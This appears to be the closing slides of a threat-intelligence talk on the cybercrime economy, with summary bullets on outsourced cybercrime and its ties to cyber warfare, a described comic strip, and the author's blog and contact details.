• Asymmetric Warfare on Demand
• Cyber Crime is outsourceable
• Cyber Crime Powerhouses outpace boutique cyber crime operations
• Cyber Crime - an HR pool for cyber warfare talent - FAPSI
Conclusion and Key Summary Points - It's All a Matter of Perspective

[Comic strip (ddanchev.stripgenerator.com, made with www.stripgenerator.com), three panels: "Somewhere in Eastern Europe", "At a bored plastic surgeon's mansion", "In a 'hacker recruitment' basement".]
Conclusion and Key Summary Points

• http://ddanchev.blogspot.com - switchboard to real-time and historical threat Intell
• dancho.danchev@gmail.com

Thank you for your time and attention!


